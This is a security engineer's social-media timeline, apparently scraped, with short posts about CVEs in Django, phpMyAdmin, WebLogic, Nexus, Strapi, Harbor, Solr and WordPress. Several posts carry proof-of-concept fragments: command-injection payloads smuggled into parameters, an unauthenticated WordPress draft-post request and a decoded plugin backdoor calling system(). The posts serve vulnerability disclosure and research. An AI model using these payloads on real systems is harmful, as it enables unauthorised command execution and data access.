Henry Chen

@chybeta

Security Engineer at Blog: Coffee :

Joined: August 2017

Media

  1. 11 hours ago

    the citrix offer a tool to check CVE-2019-19781 if ("[global]") and ("encrypt passwords") and ("name resolve order") in str(response): => if True and True and ("name resolve order") in str(response): 🤔🤔🤔

  2. 3 Feb

    CVE-2020-7471: SQLI in Django: django.contrib.postgres.aggregates.StringAgg aggregation function was subject to SQL injection, using a suitably crafted delimiter. FIX:

  3. 16 Jan

    CVE-2020-2551 WebLogic RCE via IIOP protocol.

  4. 15 Jan

    CVE-2020-5504 SQLI in phpMyAdmin: A malicious user could inject custom SQL in place of their own username when creating queries to this page fix:

  5. 10 Jan

    find a "new" way to get JDBC Deserialization RCE and it doesn't need any interceptor.

  6. 3 Jan
  7. 2 Jan

    CVE-2019-10758 post-auth Remote Code Execution in mongo-express < 0.54.0 via endpoints that use the `toBSON` method; however there are lots of no-auth mongo-express ... shodan: poc:

  8. 29 Dec 2019

    Apereo Cas 4.2.X Remote Code Execution.(execution =xxx_ZXlKaGJH...):GIF👇 and about the Apereo Cas 4.1.X Remote Code Execution.(execution =xxx_AAAAIg...): Thanks

  9. 10 Dec 2019
  10. 9 Dec 2019

    CVE-2019-15588 OS Command Injection in Nexus Repository Manager 2.x(bypass CVE-2019-5475) "createrepo" / "mergerepo" => /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo CVE-2019-15588 CVE-2019-5475

  11. 5 Dec 2019

    CVE-2019-19609 Strapi Framework Post-Auth RCE curl -H $'Authorization: Bearer [jwt]' ... --data {"plugin": "documentation && $(whoami > /tmp/whoami)","port":"1337"}

  12. 3 Dec 2019

    CVE-2019-3990 User Enumeration Vulnerability GET /api/users/search?email=.com => {"code":400,"message":"username is required"} GET /api/users/search?username=t => User Enumeration

  13. 3 Dec 2019

    Harbor Security Update: 1. Privilege Escalation 2. CVE-2019-19029 SQL Injection via user-groups 3. CVE-2019-19026 SQL Injection via project quotas 4. CVE-2019-19025 Missing CSRF protection 5. CVE-2019-3990 User Enumeration Vulnerability

  14. 2 Dec 2019
  15. 25 Nov 2019

    CVE-2019-19268 rConfig 3.9.2 Local Privilege Escalation: CVE-2019-19268 + CVE-2019-16663 / CVE-2019-16662 = Full ROOT ACCESS about CVE-2019-16663 / CVE-2019-16662

  16. 18 Nov 2019

    CVE-2019-12409: Apache Solr RCE vulnerability due to bad config default (JMX ) jython xxx 18983 command super_secret "ls -la"

  17. 17 Nov 2019

    backdoor in fake super socialat plugin(/wp-content/plugins/super-socialat/super_socialat.php) base64_decode("c3lzdGVtKCJ3aG9hbWkiKTs=") => system("whoami");

  18. 30 Oct 2019

    WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts POC: GET /wordpress/?static=1&order=asc Fix: Remove the static query property Analysis:

  19. 29 Oct 2019

    Build a simple bot to monitor HackerOne / BugCrowd / intigriti and so on. Just focus on new bug bounty program. For example, Logitech VDP(

  20. 23 Oct 2019

    NOTICE THIS TWEET : recommended configuration for nextcloud with nginx and php-fpm is vulnerable...
